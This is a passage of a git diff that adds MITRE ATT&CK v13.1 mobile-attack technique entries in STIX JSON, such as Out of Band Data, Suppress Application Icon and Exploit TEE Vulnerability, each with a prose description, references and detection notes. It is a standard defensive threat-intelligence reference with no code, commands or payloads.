Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "created": "2022-04-01T14:55:10.494Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1634", + "external_id": "T1634" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "external_id": "AUT-11" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63.json new file mode 100644 index 0000000000000000000000000000000000000000..d5f10f5ec59967c7d32d4158a8361ca813963062 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--c692a9c5-5c08-4477-8616-7dcfeaca0390", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--d731c21e-f27d-4756-b418-0e2aaabd6d63", + "created": "2017-10-25T14:48:25.322Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1463", + "url": "https://attack.mitre.org/techniques/T1463" + }, + { + "source_name": "FireEye-SSL", + "url": "https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html", + "description": "Adrian Mettler, Yulong Zhang, Vishwanath Raman. (2014, August 20). SSL VULNERABILITIES: WHO LISTENS WHEN ANDROID APPLICATIONS TALK?. Retrieved December 24, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and a remote server is not securely protected, then an attacker positioned on the network may be able to manipulate network communication without being detected. For example, FireEye researchers found in 2014 that 68% of the top 1,000 free applications in the Google Play Store had at least one Transport Layer Security (TLS) implementation vulnerability potentially opening the applications' network traffic to adversary-in-the-middle attacks (Citation: FireEye-SSL).", + "modified": "2022-04-06T15:44:48.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Manipulate Device Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a.json new file mode 100644 index 0000000000000000000000000000000000000000..5ae59440cd3d33c4d21748ee8547da3dffed91fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--fb4d19b9-549e-4256-a3f1-432d632c1efb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "created": "2019-10-10T15:12:42.790Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1533", + "url": "https://attack.mitre.org/techniques/T1533" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-41" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration. \n\n \n\nAccess to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions. \n\n ", + "modified": "2022-04-01T16:53:27.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Local System", + "x_mitre_detection": "Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd.json new file mode 100644 index 0000000000000000000000000000000000000000..177c233c01603c00919732f55d27ed3cf72e09ce --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--359a7149-d4a7-4ba6-96c7-bb555d1d5178", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:53:59.025Z", + "name": "Out of Band Data", + "description": "Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth. \n\n \n\nOn Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there. \n\n \n\nOn iOS, there is no way to programmatically read push notifications. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If a user sees a notification with text they do not recognize, they should review their list of installed applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "created": "2022-04-06T15:27:34.300Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1644", + "external_id": "T1644" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84.json new file mode 100644 index 0000000000000000000000000000000000000000..de76e688d67d182ee13794809f66b26af18af872 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--a0b16799-dd0c-4bc5-ae2a-ee4d26ec4b1e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "created": "2019-10-01T14:18:47.762Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521", + "url": "https://attack.mitre.org/techniques/T1521" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.", + "modified": "2022-04-05T20:11:35.852Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Encrypted Channel", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884.json new file mode 100644 index 0000000000000000000000000000000000000000..91de4e9d6fe97b6a1e0aaa204a47b996a725b5c6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--7f946d28-ffa9-48e9-978c-4cfa64c85533", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ef771e03-e080-43b4-a619-ac6f84899884", + "created": "2017-10-25T14:48:22.716Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1405", + "url": "https://attack.mitre.org/techniques/T1405" + }, + { + "source_name": "EkbergTEE", + "url": "https://usmile.at/symposium/program/2015/ekberg", + "description": "Jan-Erik Ekberg. (2015, September 10). Android and trusted execution environments. Retrieved December 9, 2016." + }, + { + "source_name": "Thomas-TrustZone", + "url": "https://usmile.at/symposium/program/2015/thomas-holmes", + "description": "Josh Thomas and Charles Holmes. (2015, September). An infestation of dragons: Exploring vulnerabilities in the ARM TrustZone architecture. Retrieved December 9, 2016." + }, + { + "source_name": "QualcommKeyMaster", + "url": "https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html", + "description": "laginimaineb. (2016, June). Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption. Retrieved December 9, 2016." + }, + { + "source_name": "laginimaineb-TEE", + "url": "http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html", + "description": "laginimaineb. (2016, May). War of the Worlds - Hijacking the Linux Kernel from QSEE. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).", + "modified": "2022-04-06T15:41:57.666Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit TEE Vulnerability", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6.json new file mode 100644 index 0000000000000000000000000000000000000000..37450fe731dcfdaf44014f59c453c03ab5ca7f05 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--9c3bd146-03dd-4dd0-9e78-a8e3d776fb57", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:51:29.931Z", + "name": "Suppress Application Icon", + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions. \n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker) \n\nBeginning in Android 10, changes were introduced to inhibit malicious applications\u2019 ability to hide their icon. If an app is a system app, requests no permissions, or does not have a launcher activity, the application\u2019s icon will be fully hidden. Further, if the device is fully managed or the application is in a work profile, the icon will be fully hidden. Otherwise, a synthesized activity is shown, which is a launcher icon that represents the app\u2019s details page in the system settings. If the user clicks the synthesized activity in the launcher, they are taken to the application\u2019s details page in the system settings.(Citation: Android 10 Limitations to Hiding App Icons)(Citation: LauncherApps getActivityList)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings. If the user is redirected to the device settings when tapping an application\u2019s icon, they should inspect the application to ensure it is genuine. Application vetting services could potentially detect the usage of APIs intended for suppressing the application\u2019s icon.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "created": "2022-03-30T20:06:22.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1628/001", + "external_id": "T1628.001" + }, + { + "source_name": "Android 10 Limitations to Hiding App Icons", + "description": "Android. (n.d.). Android 10 Release Notes: Limitations to hiding app icons. Retrieved March 30, 2022.", + "url": "https://source.android.com/setup/start/android-10-release#limitations_to_hiding_app_icons" + }, + { + "source_name": "LauncherApps getActivityList", + "description": "Android. (n.d.). LauncherApps: getActivityList. Retrieved March 30, 2022.", + "url": "https://developer.android.com/reference/kotlin/android/content/pm/LauncherApps#getactivitylist" + }, + { + "source_name": "sunny-stolen-credentials", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/" + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/" + }, + { + "source_name": "bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019.", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468.json new file mode 100644 index 0000000000000000000000000000000000000000..97cc3c232d4738fc3456a0d8bd964de719d1d878 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--56217f9b-b6c4-42e3-9240-88e33228e89f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f1c3d071-0c24-483d-aca0-e8b8496ce468", + "created": "2017-10-25T14:48:18.583Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1399", + "url": "https://attack.mitre.org/techniques/T1399" + }, + { + "source_name": "Apple-iOSSecurityGuide", + "url": "https://www.apple.com/business/docs/iOS_Security_Guide.pdf", + "description": "Apple. (2016, May). iOS Security. Retrieved December 21, 2016." + }, + { + "source_name": "Roth-Rootkits", + "url": "https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf", + "description": "Thomas Roth. (2013). Next generation mobile rootkits. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)", + "modified": "2022-04-06T15:48:41.647Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify Trusted Execution Environment", + "x_mitre_detection": "Devices may perform cryptographic integrity checks of code running within the TEE at boot time.\n\niOS devices will fail to boot if the software running within the Secure Enclave does not pass signature verification.(Citation: Apple-iOSSecurityGuide)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a.json new file mode 100644 index 0000000000000000000000000000000000000000..0b268609f2ff1302f1c243b0026a3cf27d0a50df --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--54e40de0-8b75-4a0d-b5b9-46bb9fd6df34", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "type": "attack-pattern", + "created": "2017-10-25T14:48:23.652Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1459", + "external_id": "T1459" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Device Unlock Code Guessing or Brute Force", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34.json new file mode 100644 index 0000000000000000000000000000000000000000..5de3e679c07ee17254ed2dd0140f7b92d92274a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--e83f9664-b4a4-43e8-8146-0b000a8dc62c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f58cd69a-e548-478b-9248-8a9af881dc34", + "created": "2017-10-25T14:48:21.667Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1466", + "url": "https://attack.mitre.org/techniques/T1466" + }, + { + "source_name": "NIST-SP800187", + "url": "http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf", + "description": "Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "CEL-3" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate(Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.", + "modified": "2022-04-06T15:50:42.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Downgrade to Insecure Protocols", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf.json new file mode 100644 index 0000000000000000000000000000000000000000..112be6f58ce6aba8fbb4a3a90e99dd90c4f207e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--25933274-c942-48bc-921f-631e4cbb482f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--f981d199-2720-467e-9dc9-eea04dbe05cf", + "created": "2017-10-25T14:48:18.937Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1472", + "url": "https://attack.mitre.org/techniques/T1472" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.", + "modified": "2022-04-06T13:57:49.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Generate Fraudulent Advertising Revenue", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df.json new file mode 100644 index 0000000000000000000000000000000000000000..d59d61462aa1d8e2091b6e631f7ac6bcc8d7bc5f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--9dbf984f-8031-4dee-a3db-8c73367c39c0", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--f9e4f526-ac9d-4df5-8949-833a82a1d2df", + "type": "attack-pattern", + "created": "2017-10-25T14:48:09.446Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1473", + "external_id": "T1473" + } + ], + "modified": "2018-10-17T01:05:10.704Z", + "name": "Malicious or Vulnerable Built-in Device Functionality", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df.json new file mode 100644 index 0000000000000000000000000000000000000000..6aae1896cc0c5cf028aa65779002cba6a0e71f45 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--e208176c-e4ce-4cc9-9005-2e1643406dab", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "created": "2022-03-30T19:19:23.777Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1406.001", + "url": "https://attack.mitre.org/techniques/T1406/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.", + "modified": "2022-04-21T17:30:16.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Steganography", + "x_mitre_detection": "Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. Look for strings are other signatures left in system artifacts related to decoding steganography.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + 